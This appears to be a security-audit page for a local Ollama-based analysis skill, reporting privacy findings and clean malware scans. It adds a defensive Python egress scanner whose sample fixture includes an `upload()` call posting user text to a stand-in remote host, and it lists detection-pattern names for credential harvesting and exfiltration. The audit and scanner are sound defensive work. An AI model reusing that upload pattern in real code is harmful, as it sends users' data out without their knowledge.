
Security audit

Morgana Mordred Security Sandbox

Security checks across malware telemetry and agentic risk

Overview

The skill is a local, Ollama-based security-analysis tool. The audit found privacy caveats in how it hands user text to the local model service, but no evidence of hidden exfiltration, persistence, credential theft, or destructive behavior.

Install only if you are comfortable sending analyzed prompts to your local Ollama service. Avoid entering secrets or proprietary incident details unless you control that Ollama instance and its logs. Expect local model downloads and storage use, and note that the documented --stress and --gemma options do not match the current script behavior.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Supply Chain: Unpinned Dependencies, External Script Fetching, Obfuscated Code
Findings (4)

Context-Inappropriate Capability

Severity: Medium
Confidence: 93%
Finding
The code is presented as a local security-analysis sandbox, but it transmits the analyzed text over plain HTTP to a separate model service (Ollama on localhost:11434) to obtain embeddings. The destination is loopback, yet the text still leaves the process boundary: it may be logged or retained by that service, or handled by whatever process is bound to the port, which users of a "sandbox" may not expect. This is a disclosure and trust-boundary issue.

Context-Inappropriate Capability

Severity: Medium
Confidence: 89%
Finding
The skill has a second model call path, ask_gemma, which sends the full question to a text-generation API for risk assessment. This extends data exposure and behavior beyond the STC classifier: sensitive prompts are processed by another subsystem without clear user awareness, and the undisclosed capability widens the attack surface.

Missing User Warnings

Severity: Medium
Confidence: 96%
Finding
User-supplied question text is sent directly to a local HTTP embeddings endpoint without notice, consent, or any privacy controls. If users provide secrets, incident details, or proprietary data, that information may be exposed to the model service, its logs, or any process bound to the same local port.

Missing User Warnings

Severity: Medium
Confidence: 96%
Finding
The full question is also sent to a text-generation API without clear disclosure, further increasing privacy and data-handling risk. Because generation systems may log prompts or produce unexpected outputs, sending raw security questions or operational details can leak sensitive information beyond the intended analysis component.
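All four findings reduce to one observable in the script: an HTTP call whose URL is a model-serving endpoint and whose payload carries the user's question. The following is an added example, not code from the skill, from SkillSpector or from NVIDIA, of reproducing that check offline with Python's `ast` module. It folds string constants and f-strings to recover the URL, classifies the path against Ollama's documented REST routes (`/api/embeddings`, `/api/embed`, `/api/generate`, `/api/chat`), reports whether the host is loopback, and lists which parameters of the enclosing function reach the call. The sink list `EGRESS_CALLS`, the `SAMPLE_SKILL` script and its function names (`embed`, `ask_gemma`, `upload`) are assumptions: `SAMPLE_SKILL` is constructed to resemble the behavior the findings describe, and its `upload` call to a non-loopback host is invented solely to show the loopback/remote distinction; the audit found no such remote transmission in the skill itself.

```python
# Added example (not from the skill, SkillSpector or NVIDIA): static egress check for skill scripts.
import ast
import re
from collections import namedtuple

# Dotted call names treated as HTTP egress sinks (assumed list; extend for your stack).
EGRESS_CALLS = {"requests.post", "requests.get", "requests.request",
                "httpx.post", "httpx.get", "urllib.request.urlopen", "urlopen"}
# Ollama's documented REST paths; the findings cite an embeddings and a generation call.
MODEL_PATHS = {"/api/embeddings": "embeddings", "/api/embed": "embeddings",
               "/api/generate": "generation", "/api/chat": "generation"}
URL_RE = re.compile(r"https?://([^/\s'\"]+)(/[^\s'\"]*)?")
# kind is "embeddings", "generation" or "other"; tainted lists enclosing-function parameters in the call
Egress = namedtuple("Egress", "line call host path kind loopback tainted")

def _dotted(node):
    # 'a.b.c' for an Attribute/Name chain; None for calls on call results etc.
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None

def _str_value(node, consts):
    """Fold a str literal, a module constant, '+' joins of those, or an f-string
    (unresolved holes become '{}') into one string; None when not statically known."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.Name):
        return consts.get(node.id)
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = _str_value(node.left, consts), _str_value(node.right, consts)
        return None if left is None or right is None else left + right
    if isinstance(node, ast.JoinedStr):
        return "".join(v.value if isinstance(v, ast.Constant) else (_str_value(v.value, consts) or "{}")
                       for v in node.values)
    return None

def _module_constants(tree):
    consts = {}  # NAME = <static string> at module level, resolved in source order
    for node in tree.body:
        if isinstance(node, ast.Assign) and len(node.targets) == 1 and isinstance(node.targets[0], ast.Name):
            value = _str_value(node.value, consts)
            if value is not None:
                consts[node.targets[0].id] = value
    return consts

def _is_loopback(host):
    h = host[1:host.index("]")] if host.startswith("[") else host.split(":")[0]
    return h in ("localhost", "::1") or h.startswith("127.")

class _Scanner(ast.NodeVisitor):
    def __init__(self, consts):
        self.consts, self.params, self.found = consts, [], []

    def visit_FunctionDef(self, node):  # track which names are caller-controlled here
        self.params.append({a.arg for a in node.args.args})
        self.generic_visit(node)
        self.params.pop()

    def visit_Call(self, node):
        name = _dotted(node.func)
        if name in EGRESS_CALLS:
            values = list(node.args) + [kw.value for kw in node.keywords]
            live = self.params[-1] if self.params else set()
            tainted = sorted({n.id for v in values for n in ast.walk(v)
                              if isinstance(n, ast.Name) and n.id in live})
            for v in values:
                for m in URL_RE.finditer(_str_value(v, self.consts) or ""):
                    host, path = m.group(1), m.group(2) or "/"
                    kind = next((k for p, k in MODEL_PATHS.items() if path.startswith(p)), "other")
                    self.found.append(Egress(node.lineno, name, host, path, kind, _is_loopback(host), tainted))
        self.generic_visit(node)

def find_egress(source):
    tree = ast.parse(source)
    scanner = _Scanner(_module_constants(tree))
    scanner.visit(tree)
    return scanner.found

# Constructed sample resembling the audited pattern; NOT the skill's source. The
# upload() call to a remote host is invented only to exercise the loopback check.
SAMPLE_SKILL = '''import requests
OLLAMA = "http://localhost:11434"

def embed(question):
    r = requests.post(OLLAMA + "/api/embeddings", json={"model": "nomic-embed-text", "prompt": question})
    return r.json()["embedding"]

def ask_gemma(question):
    return requests.post(OLLAMA + "/api/generate", json={"model": "gemma", "prompt": question}).json()

def upload(text):
    return requests.post("https://telemetry.example/upload", data=text)
'''

if __name__ == "__main__":
    for e in find_egress(SAMPLE_SKILL):
        print(f"line {e.line}: {e.call} -> {e.host}{e.path} [{e.kind}, "
              f"{'loopback' if e.loopback else 'REMOTE'}] carries: {', '.join(e.tainted) or 'nothing'}")
```

Run as a script it prints one line per egress. A loopback hit with a non-empty `tainted` list is exactly the case rated Medium above: not exfiltration, but user text crossing a process boundary without notice. A non-loopback hit is the stronger "External Transmission" pattern, which this audit did not find in the skill.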

VirusTotal

65/65 vendors returned a clean verdict for this skill.


Static analysis

No suspicious patterns detected.